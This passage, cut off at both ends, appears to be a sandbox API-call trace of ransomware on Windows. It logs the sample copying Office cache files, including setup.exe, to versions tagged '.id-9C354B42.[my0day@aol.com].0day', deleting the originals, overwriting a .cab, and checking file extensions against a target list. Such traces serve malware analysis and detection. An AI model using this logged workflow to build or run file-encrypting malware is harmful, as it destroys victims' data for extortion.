lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0044.762] GetFileSizeEx (in: hFile=0x16c, lpFileSize=0x326ff1c | out: lpFileSize=0x326ff1c*=715834) returned 1 [0044.762] CloseHandle (hObject=0x16c) returned 1 [0044.762] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms")) returned 0x2020 [0044.762] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0044.762] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0044.762] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x326fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.762] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x326fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.762] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8 [0044.762] GetLastError () returned 0x0 [0044.763] ReadFile (in: hFile=0x16c, lpBuffer=0x3b70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x326fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesRead=0x326fed4*=0xaec3a, lpOverlapped=0x0) returned 1 [0044.831] WriteFile (in: hFile=0x1d8, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0xaec40, lpNumberOfBytesWritten=0x326fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x326fc9c*=0xaec40, lpOverlapped=0x0) returned 1 [0044.844] ReadFile (in: hFile=0x16c, lpBuffer=0x3b70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x326fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesRead=0x326fed4*=0x0, lpOverlapped=0x0) returned 1 [0044.844] WriteFile (in: hFile=0x1d8, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0x104, lpNumberOfBytesWritten=0x326fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x326fc9c*=0x104, lpOverlapped=0x0) returned 1 [0044.844] SetEndOfFile (hFile=0x1d8) returned 1 [0044.844] CloseHandle (hObject=0x1d8) returned 1 [0044.844] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x326fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.844] SetEndOfFile (hFile=0x16c) returned 1 [0045.075] CloseHandle (hObject=0x16c) returned 1 [0045.075] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0045.075] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms")) returned 1 [0045.075] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0045.075] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0045.075] lstrlenW (lpString=".doc") returned 4 [0045.075] lstrcmpiW (lpString1=".doc", lpString2="m-ms") returned -1 [0045.075] lstrlenW (lpString=".docx") returned 5 [0045.075] lstrcmpiW (lpString1=".docx", lpString2="rm-ms") returned -1 [0045.075] lstrlenW (lpString=".pdf") returned 4 [0045.075] lstrcmpiW (lpString1=".pdf", lpString2="m-ms") returned -1 [0045.075] lstrlenW (lpString=".xls") returned 4 [0045.075] lstrcmpiW (lpString1=".xls", lpString2="m-ms") returned -1 [0045.075] lstrlenW (lpString=".xlsx") returned 5 [0045.075] lstrcmpiW (lpString1=".xlsx", lpString2="rm-ms") returned -1 [0045.075] lstrlenW (lpString=".ppt") returned 4 [0045.076] lstrcmpiW (lpString1=".ppt", lpString2="m-ms") returned -1 [0045.076] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0045.076] lstrlenW (lpString=".zip") returned 4 [0045.076] lstrcmpiW (lpString1=".zip", lpString2="m-ms") returned -1 [0045.076] lstrlenW (lpString=".rar") returned 4 [0045.076] lstrcmpiW (lpString1=".rar", lpString2="m-ms") returned -1 [0045.076] lstrlenW (lpString=".bz2") returned 4 [0045.076] lstrcmpiW (lpString1=".bz2", lpString2="m-ms") returned -1 [0045.076] lstrlenW (lpString=".7z") returned 3 [0045.076] lstrcmpiW (lpString1=".7z", lpString2="-ms") returned -1 [0045.076] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0045.076] lstrlenW (lpString=".dbf") returned 4 [0045.076] lstrcmpiW (lpString1=".dbf", lpString2="m-ms") returned -1 [0045.076] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0045.076] lstrlenW (lpString=".1cd") returned 4 [0045.076] lstrcmpiW (lpString1=".1cd", lpString2="m-ms") returned -1 [0045.076] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0045.076] lstrlenW (lpString=".jpg") returned 4 [0045.076] lstrcmpiW (lpString1=".jpg", lpString2="m-ms") returned -1 [0045.076] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0045.076] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0045.076] lstrlenW (lpString=".doc") returned 4 [0045.076] lstrcmpiW (lpString1=".doc", lpString2="m-ms") returned -1 [0045.076] lstrlenW (lpString=".docx") returned 5 [0045.076] lstrcmpiW (lpString1=".docx", lpString2="rm-ms") returned -1 [0045.076] lstrlenW (lpString=".pdf") returned 4 [0045.076] lstrcmpiW (lpString1=".pdf", lpString2="m-ms") returned -1 [0045.076] lstrlenW (lpString=".xls") returned 4 [0045.076] lstrcmpiW (lpString1=".xls", lpString2="m-ms") returned -1 [0045.076] lstrlenW (lpString=".xlsx") returned 5 [0045.076] lstrcmpiW (lpString1=".xlsx", lpString2="rm-ms") returned -1 [0045.076] lstrlenW (lpString=".ppt") returned 4 [0045.076] lstrcmpiW (lpString1=".ppt", lpString2="m-ms") returned -1 [0045.077] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0045.077] lstrlenW (lpString=".zip") returned 4 [0045.077] lstrcmpiW (lpString1=".zip", lpString2="m-ms") returned -1 [0045.077] lstrlenW (lpString=".rar") returned 4 [0045.077] lstrcmpiW (lpString1=".rar", lpString2="m-ms") returned -1 [0045.077] lstrlenW (lpString=".bz2") returned 4 [0045.077] lstrcmpiW (lpString1=".bz2", lpString2="m-ms") returned -1 [0045.077] lstrlenW (lpString=".7z") returned 3 [0045.077] lstrcmpiW (lpString1=".7z", lpString2="-ms") returned -1 [0045.077] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0045.077] lstrlenW (lpString=".dbf") returned 4 [0045.077] lstrcmpiW (lpString1=".dbf", lpString2="m-ms") returned -1 [0045.077] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0045.077] lstrlenW (lpString=".1cd") returned 4 [0045.077] lstrcmpiW (lpString1=".1cd", lpString2="m-ms") returned -1 [0045.077] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0045.077] lstrlenW (lpString=".jpg") returned 4 [0045.077] lstrcmpiW (lpString1=".jpg", lpString2="m-ms") returned -1 [0045.077] lstrcmpiW (lpString1=".exe", lpString2=".0day") returned 1 [0045.077] lstrlenW (lpString="setup.exe") returned 9 [0045.077] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0045.077] GetFileSizeEx (in: hFile=0x16c, lpFileSize=0x326ff1c | out: lpFileSize=0x326ff1c*=1377656) returned 1 [0045.078] CloseHandle (hObject=0x16c) returned 1 [0045.078] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.exe")) returned 0x2020 [0045.078] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.exe.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0045.078] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0045.078] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x326fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.078] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x326fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.078] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.exe.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0045.078] GetLastError () returned 0x0 [0045.078] ReadFile (in: hFile=0x16c, lpBuffer=0x3b70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x326fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesRead=0x326fed4*=0xffff0, lpOverlapped=0x0) returned 1 [0045.120] WriteFile (in: hFile=0x1fc, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0x326fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x326fc9c*=0xffff0, lpOverlapped=0x0) returned 1 [0045.803] ReadFile (in: hFile=0x16c, lpBuffer=0x3b70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x326fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesRead=0x326fed4*=0x50588, lpOverlapped=0x0) returned 1 [0045.816] WriteFile (in: hFile=0x1fc, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0x50590, lpNumberOfBytesWritten=0x326fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x326fc9c*=0x50590, lpOverlapped=0x0) returned 1 [0045.870] ReadFile (in: hFile=0x16c, lpBuffer=0x3b70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x326fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesRead=0x326fed4*=0x0, lpOverlapped=0x0) returned 1 [0045.870] WriteFile (in: hFile=0x1fc, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x326fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x326fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0045.870] SetEndOfFile (hFile=0x1fc) returned 1 [0045.870] CloseHandle (hObject=0x1fc) returned 1 [0045.870] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x326fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.870] SetEndOfFile (hFile=0x16c) returned 1 [0045.873] CloseHandle (hObject=0x16c) returned 1 [0045.873] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0045.874] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.exe")) returned 1 [0045.874] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0045.874] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0045.874] lstrlenW (lpString=".doc") returned 4 [0045.874] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0045.874] lstrlenW (lpString=".docx") returned 5 [0045.874] lstrcmpiW (lpString1=".docx", lpString2="p.exe") returned -1 [0045.874] lstrlenW (lpString=".pdf") returned 4 [0045.874] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0045.874] lstrlenW (lpString=".xls") returned 4 [0045.874] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0045.874] lstrlenW (lpString=".xlsx") returned 5 [0045.874] lstrcmpiW (lpString1=".xlsx", lpString2="p.exe") returned -1 [0045.874] lstrlenW (lpString=".ppt") returned 4 [0045.874] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0045.874] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0045.874] lstrlenW (lpString=".zip") returned 4 [0045.874] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0045.874] lstrlenW (lpString=".rar") returned 4 [0045.874] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0045.874] lstrlenW (lpString=".bz2") returned 4 [0045.874] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0045.874] lstrlenW (lpString=".7z") returned 3 [0045.874] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0045.874] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0045.875] lstrlenW (lpString=".dbf") returned 4 [0045.875] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0045.875] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0045.875] lstrlenW (lpString=".1cd") returned 4 [0045.875] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0045.875] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0045.875] lstrlenW (lpString=".jpg") returned 4 [0045.875] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0045.875] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0045.875] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0045.875] lstrlenW (lpString=".doc") returned 4 [0045.875] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0045.875] lstrlenW (lpString=".docx") returned 5 [0045.875] lstrcmpiW (lpString1=".docx", lpString2="p.exe") returned -1 [0045.875] lstrlenW (lpString=".pdf") returned 4 [0045.875] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0045.875] lstrlenW (lpString=".xls") returned 4 [0045.875] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0045.875] lstrlenW (lpString=".xlsx") returned 5 [0045.875] lstrcmpiW (lpString1=".xlsx", lpString2="p.exe") returned -1 [0045.875] lstrlenW (lpString=".ppt") returned 4 [0045.875] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0045.875] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0045.875] lstrlenW (lpString=".zip") returned 4 [0045.875] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0045.875] lstrlenW (lpString=".rar") returned 4 [0045.875] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0045.875] lstrlenW (lpString=".bz2") returned 4 [0045.875] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0045.875] lstrlenW (lpString=".7z") returned 3 [0045.875] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0045.875] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0045.875] lstrlenW (lpString=".dbf") returned 4 [0045.876] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0045.876] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0045.876] lstrlenW (lpString=".1cd") returned 4 [0045.876] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0045.876] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0045.876] lstrlenW (lpString=".jpg") returned 4 [0045.876] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0045.876] lstrcmpiW (lpString1=".cab", lpString2=".0day") returned 1 [0045.876] lstrlenW (lpString="OWOW32WW.cab") returned 12 [0045.876] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\owow32ww.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0047.463] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x326ff1c | out: lpFileSize=0x326ff1c*=36233052) returned 1 [0047.463] CloseHandle (hObject=0x190) returned 1 [0047.463] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\owow32ww.cab")) returned 0x2020 [0047.463] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\owow32ww.cab.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0047.463] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\owow32ww.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\owow32ww.cab.id-9c354b42.[my0day@aol.com].0day")) returned 1 [0047.463] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\owow32ww.cab.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0047.463] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x326fc6c | out: lpNewFilePointer=0x0) returned 1 [0047.463] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x326fc2c | out: lpNewFilePointer=0x0) returned 1 [0047.464] ReadFile (in: hFile=0x190, lpBuffer=0x3b70058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x326fc38, lpOverlapped=0x0 | out: lpBuffer=0x3b70058*, lpNumberOfBytesRead=0x326fc38*=0x40000, lpOverlapped=0x0) returned 1 [0047.474] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0xb84a74, lpNewFilePointer=0x0, dwMoveMethod=0x326fc2c | out: lpNewFilePointer=0x0) returned 1 [0047.474] ReadFile (in: hFile=0x190, lpBuffer=0x3bb0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x326fc38, lpOverlapped=0x0 | out: lpBuffer=0x3bb0058*, lpNumberOfBytesRead=0x326fc38*=0x40000, lpOverlapped=0x0) returned 1 [0047.485] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x326fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0047.485] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x224df5c, lpNewFilePointer=0x0, dwMoveMethod=0x326fc2c | out: lpNewFilePointer=0x0) returned 1 [0047.485] ReadFile (in: hFile=0x190, lpBuffer=0x3bf0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x326fc38, lpOverlapped=0x0 | out: lpBuffer=0x3bf0058*, lpNumberOfBytesRead=0x326fc38*=0x40000, lpOverlapped=0x0) returned 1 [0047.502] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x326fec8 | out: lpNewFilePointer=0x0) returned 1 [0047.502] WriteFile (in: hFile=0x190, lpBuffer=0x3b70020*, nNumberOfBytesToWrite=0xc0104, lpNumberOfBytesWritten=0x326fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3b70020*, lpNumberOfBytesWritten=0x326fcb0*=0xc0104, lpOverlapped=0x0) returned 1 [0047.736] SetEndOfFile (hFile=0x190) returned 1 [0047.736] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x40000) returned 0x3f52098 [0047.740] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x326fc7c | out: lpNewFilePointer=0x0) returned 1 [0047.740] WriteFile (in: hFile=0x190, lpBuffer=0x3f52098*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x326fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f52098*, lpNumberOfBytesWritten=0x326fc88*=0x40000, lpOverlapped=0x0) returned 1 [0047.741] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0xb84a74, lpNewFilePointer=0x0, dwMoveMethod=0x326fc7c | out: lpNewFilePointer=0x0) returned 1 [0047.741] WriteFile (in: hFile=0x190, lpBuffer=0x3f52098*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x326fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f52098*, lpNumberOfBytesWritten=0x326fc88*=0x40000, lpOverlapped=0x0) returned 1 [0047.741] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x224df5c, lpNewFilePointer=0x0, dwMoveMethod=0x326fc7c | out: lpNewFilePointer=0x0) returned 1 [0047.741] WriteFile (in: hFile=0x190, lpBuffer=0x3f52098*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x326fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f52098*, lpNumberOfBytesWritten=0x326fc88*=0x40000, lpOverlapped=0x0) returned 1 [0047.743] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3f52098 | out: hHeap=0x5f0000) returned 1 [0047.743] CloseHandle (hObject=0x190) returned 1 [0047.744] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x2020) returned 1 [0047.744] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0047.744] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0047.744] lstrlenW (lpString=".doc") returned 4 [0047.744] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0047.744] lstrlenW (lpString=".docx") returned 5 [0047.744] lstrcmpiW (lpString1=".docx", lpString2="W.cab") returned -1 [0047.744] lstrlenW (lpString=".pdf") returned 4 [0047.744] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0047.744] lstrlenW (lpString=".xls") returned 4 [0047.744] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0047.744] lstrlenW (lpString=".xlsx") returned 5 [0047.744] lstrcmpiW (lpString1=".xlsx", lpString2="W.cab") returned -1 [0047.744] lstrlenW (lpString=".ppt") returned 4 [0047.744] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0047.744] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0047.744] lstrlenW (lpString=".zip") returned 4 [0047.744] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0047.744] lstrlenW (lpString=".rar") returned 4 [0047.744] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0047.744] lstrlenW (lpString=".bz2") returned 4 [0047.744] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0047.744] lstrlenW (lpString=".7z") returned 3 [0047.744] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0047.744] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0047.744] lstrlenW (lpString=".dbf") returned 4 [0047.745] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0047.745] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0047.745] lstrlenW (lpString=".1cd") returned 4 [0047.745] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0047.745] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0047.745] lstrlenW 